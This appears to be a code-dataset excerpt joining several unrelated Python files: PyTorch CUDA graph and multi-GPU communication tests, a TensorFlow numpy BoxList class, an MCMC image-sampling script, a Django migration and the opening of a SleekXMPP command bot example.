def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
py | 7df9f68f572e28eb75ede5c9bcacff4c28c06da5 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Numpy BoxList classes and functions."""
import numpy as np
class BoxList(object):
"""Box collection.
BoxList represents a list of bounding boxes as numpy array, where each
bounding box is represented as a row of 4 numbers,
[y_min, x_min, y_max, x_max]. It is assumed that all bounding boxes within a
given list correspond to a single image.
Optionally, users can add additional related fields (such as
objectness/classification scores).
"""
def __init__(self, data):
"""Constructs box collection.
Args:
data: a numpy array of shape [N, 4] representing box coordinates
Raises:
ValueError: if bbox data is not a numpy array
ValueError: if invalid dimensions for bbox data
"""
if not isinstance(data, np.ndarray):
raise ValueError('data must be a numpy array.')
if len(data.shape) != 2 or data.shape[1] != 4:
raise ValueError('Invalid dimensions for box data.')
if data.dtype != np.float32 and data.dtype != np.float64:
raise ValueError('Invalid data type for box data: float is required.')
if not self._is_valid_boxes(data):
raise ValueError('Invalid box data. data must be a numpy array of '
'N*[y_min, x_min, y_max, x_max]')
self.data = {'boxes': data}
def num_boxes(self):
"""Return number of boxes held in collections."""
return self.data['boxes'].shape[0]
def get_extra_fields(self):
"""Return all non-box fields."""
return [k for k in self.data.keys() if k != 'boxes']
def has_field(self, field):
return field in self.data
def add_field(self, field, field_data):
"""Add data to a specified field.
Args:
field: a string parameter used to speficy a related field to be accessed.
field_data: a numpy array of [N, ...] representing the data associated
with the field.
Raises:
ValueError: if the field is already exist or the dimension of the field
data does not matches the number of boxes.
"""
if self.has_field(field):
raise ValueError('Field ' + field + 'already exists')
if len(field_data.shape) < 1 or field_data.shape[0] != self.num_boxes():
raise ValueError('Invalid dimensions for field data')
self.data[field] = field_data
def get(self):
"""Convenience function for accesssing box coordinates.
Returns:
a numpy array of shape [N, 4] representing box corners
"""
return self.get_field('boxes')
def get_field(self, field):
"""Accesses data associated with the specified field in the box collection.
Args:
field: a string parameter used to speficy a related field to be accessed.
Returns:
a numpy 1-d array representing data of an associated field
Raises:
ValueError: if invalid field
"""
if not self.has_field(field):
raise ValueError('field {} does not exist'.format(field))
return self.data[field]
def get_coordinates(self):
"""Get corner coordinates of boxes.
Returns:
a list of 4 1-d numpy arrays [y_min, x_min, y_max, x_max]
"""
box_coordinates = self.get()
y_min = box_coordinates[:, 0]
x_min = box_coordinates[:, 1]
y_max = box_coordinates[:, 2]
x_max = box_coordinates[:, 3]
return [y_min, x_min, y_max, x_max]
def _is_valid_boxes(self, data):
"""Check whether data fullfills the format of N*[ymin, xmin, ymax, xmin].
Args:
data: a numpy array of shape [N, 4] representing box coordinates
Returns:
a boolean indicating whether all ymax of boxes are equal or greater than
ymin, and all xmax of boxes are equal or greater than xmin.
"""
if data.shape[0] > 0:
for i in xrange(data.shape[0]):
if data[i, 0] > data[i, 2] or data[i, 1] > data[i, 3]:
return False
return True
|
py | 7df9f6f38802672cb78b65cb0e08d4a63bb2be56 | import os
import torch
import pickle
import argparse
import torchvision.utils as vutils
# Path
import os, sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
basedir = os.path.dirname(parentdir)
sys.path.append(parentdir)
sys.path.append(basedir)
# Target
from target import get_target, get_target_id, add_target_args
# Model
from model import get_model, get_model_id, add_model_args
from survae.distributions import StandardNormal
###########
## Setup ##
###########
parser = argparse.ArgumentParser()
parser.add_argument('--exp', type=str, required=True)
parser.add_argument('--mcmc', type=str, required=True)
parser.add_argument('--num_samples', type=int, default=64)
parser.add_argument('--nrow', type=int, default=8)
eval_args = parser.parse_args()
torch.manual_seed(0)
exp_path = os.path.join('log', eval_args.exp)
mcmc_path = os.path.join('log', eval_args.exp, eval_args.mcmc)
path_args = os.path.join(exp_path, 'args.pkl')
path_chain = os.path.join(mcmc_path, 'chain.pt')
###############
## Load args ##
###############
with open(path_args, 'rb') as f:
args = pickle.load(f)
####################
## Specify target ##
####################
target = get_target(args)
target_id = get_target_id(args)
##############
## Sampling ##
##############
print('Sampling...')
with torch.no_grad():
theta = torch.load(path_chain) # (C,T,D)
theta = theta[:,-1] # (C,D)
perm = torch.randperm(theta.shape[0])
idx = perm[:eval_args.num_samples]
theta = theta[idx]
imgs = target.vec2img(theta).cpu().float().unsqueeze(1)
############
## Sample ##
############
path_samples = os.path.join(mcmc_path, 'samples.png')
vutils.save_image(imgs, fp=path_samples, nrow=eval_args.nrow)
data_true = (target.img.unsqueeze(0).unsqueeze(0)+1)/2
data_corr = (target.img_corrupted.unsqueeze(0).unsqueeze(0)+1)/2
vutils.save_image(data_true, fp=os.path.join(mcmc_path, 'data_true.png'), nrow=1)
vutils.save_image(data_corr, fp=os.path.join(mcmc_path, 'data_corr.png'), nrow=1)
|
py | 7df9f75f684bc0e8ca4ef3434380449a25e21765 | # Generated by Django 2.0.2 on 2018-02-13 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('epsilon', '0002_auto_20180213_0930'),
]
operations = [
migrations.AlterField(
model_name='tag',
name='status',
field=models.BooleanField(default=True, verbose_name='状态'),
),
]
|
py | 7df9f793e4915975b86c59d638fb70365a75db60 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
class CommandUserBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot that uses the adhoc command
provided by the adhoc_provider.py example.
"""
def __init__(self, jid, password, other, greeting):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.command_provider = other
self.greeting = greeting
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
# listen for this event so that we we can initialize
# our roster.
